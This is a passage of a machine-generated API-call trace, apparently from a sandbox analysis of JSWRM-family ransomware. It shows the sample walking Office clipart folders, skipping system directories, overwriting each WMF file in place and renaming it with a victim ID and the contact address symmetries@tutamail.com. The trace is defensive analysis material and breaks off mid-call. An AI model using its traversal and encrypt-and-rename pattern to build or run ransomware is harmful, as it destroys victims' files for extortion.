lpWideCharStr="SO01044_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01044_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01044_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0097.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0097.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01044_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01044_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01044_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0097.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0097.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0097.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0097.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01044_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.033] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=44570) returned 1 [0097.033] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xae10) returned 0x24d210 [0097.034] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xae10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xae10, lpOverlapped=0x0) returned 1 [0097.038] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.038] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xae10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xae10, lpOverlapped=0x0) returned 1 [0097.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.039] CloseHandle (hObject=0x314) returned 1 [0097.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0097.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0097.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0097.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0097.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0097.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0097.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0097.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0097.040] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01044_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01044_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0097.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0097.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0097.040] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5b38, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO01063_.WMF", cAlternateFileName="")) returned 1 [0097.041] lstrcmpiW (lpString1="SO01063_.WMF", lpString2=".") returned 1 [0097.041] lstrcmpiW (lpString1="SO01063_.WMF", lpString2="..") returned 1 [0097.041] lstrcmpiW (lpString1="SO01063_.WMF", lpString2="...") returned 1 [0097.041] lstrcmpiW (lpString1="SO01063_.WMF", lpString2="windows") returned -1 [0097.041] lstrcmpiW (lpString1="SO01063_.WMF", lpString2="recovery") returned 1 [0097.041] lstrcmpiW (lpString1="SO01063_.WMF", lpString2="perflogs") returned 1 [0097.041] lstrcmpiW (lpString1="SO01063_.WMF", lpString2="documents and settings") returned 1 [0097.041] lstrcmpiW (lpString1="SO01063_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.041] lstrcmpiW (lpString1="SO01063_.WMF", lpString2="system volume information") returned -1 [0097.041] lstrcmpiW (lpString1="SO01063_.WMF", lpString2="msocache") returned 1 [0097.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0097.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01063_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01063_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01063_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0097.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0097.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01063_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01063_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01063_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0097.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0097.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0097.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0097.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01063_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.042] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=23352) returned 1 [0097.042] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5b30) returned 0x24d210 [0097.042] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5b30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5b30, lpOverlapped=0x0) returned 1 [0097.086] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.086] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5b30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5b30, lpOverlapped=0x0) returned 1 [0097.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.086] CloseHandle (hObject=0x314) returned 1 [0097.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0097.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0097.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0097.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0097.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0097.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0097.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0097.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0097.087] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01063_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01063_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0097.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0097.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0097.088] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1075e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO01236_.WMF", cAlternateFileName="")) returned 1 [0097.088] lstrcmpiW (lpString1="SO01236_.WMF", lpString2=".") returned 1 [0097.088] lstrcmpiW (lpString1="SO01236_.WMF", lpString2="..") returned 1 [0097.088] lstrcmpiW (lpString1="SO01236_.WMF", lpString2="...") returned 1 [0097.088] lstrcmpiW (lpString1="SO01236_.WMF", lpString2="windows") returned -1 [0097.088] lstrcmpiW (lpString1="SO01236_.WMF", lpString2="recovery") returned 1 [0097.088] lstrcmpiW (lpString1="SO01236_.WMF", lpString2="perflogs") returned 1 [0097.089] lstrcmpiW (lpString1="SO01236_.WMF", lpString2="documents and settings") returned 1 [0097.089] lstrcmpiW (lpString1="SO01236_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.089] lstrcmpiW (lpString1="SO01236_.WMF", lpString2="system volume information") returned -1 [0097.089] lstrcmpiW (lpString1="SO01236_.WMF", lpString2="msocache") returned 1 [0097.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0097.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01236_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01236_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01236_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0097.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0097.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01236_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01236_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01236_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0097.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0097.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0097.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0097.089] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01236_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01236_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.090] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=67422) returned 1 [0097.090] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10750) returned 0x24d210 [0097.090] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x10750, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x10750, lpOverlapped=0x0) returned 1 [0097.096] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.096] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x10750, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x10750, lpOverlapped=0x0) returned 1 [0097.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.097] CloseHandle (hObject=0x314) returned 1 [0097.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0097.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0097.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0097.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0097.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0097.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0097.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0097.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0097.098] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01236_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01236_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01236_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01236_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0097.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0097.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0097.099] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x43b0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO01560_.WMF", cAlternateFileName="")) returned 1 [0097.099] lstrcmpiW (lpString1="SO01560_.WMF", lpString2=".") returned 1 [0097.099] lstrcmpiW (lpString1="SO01560_.WMF", lpString2="..") returned 1 [0097.099] lstrcmpiW (lpString1="SO01560_.WMF", lpString2="...") returned 1 [0097.099] lstrcmpiW (lpString1="SO01560_.WMF", lpString2="windows") returned -1 [0097.099] lstrcmpiW (lpString1="SO01560_.WMF", lpString2="recovery") returned 1 [0097.099] lstrcmpiW (lpString1="SO01560_.WMF", lpString2="perflogs") returned 1 [0097.099] lstrcmpiW (lpString1="SO01560_.WMF", lpString2="documents and settings") returned 1 [0097.099] lstrcmpiW (lpString1="SO01560_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.099] lstrcmpiW (lpString1="SO01560_.WMF", lpString2="system volume information") returned -1 [0097.099] lstrcmpiW (lpString1="SO01560_.WMF", lpString2="msocache") returned 1 [0097.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0097.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01560_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01560_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01560_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0097.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0097.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01560_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01560_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01560_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0097.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0097.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0097.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", 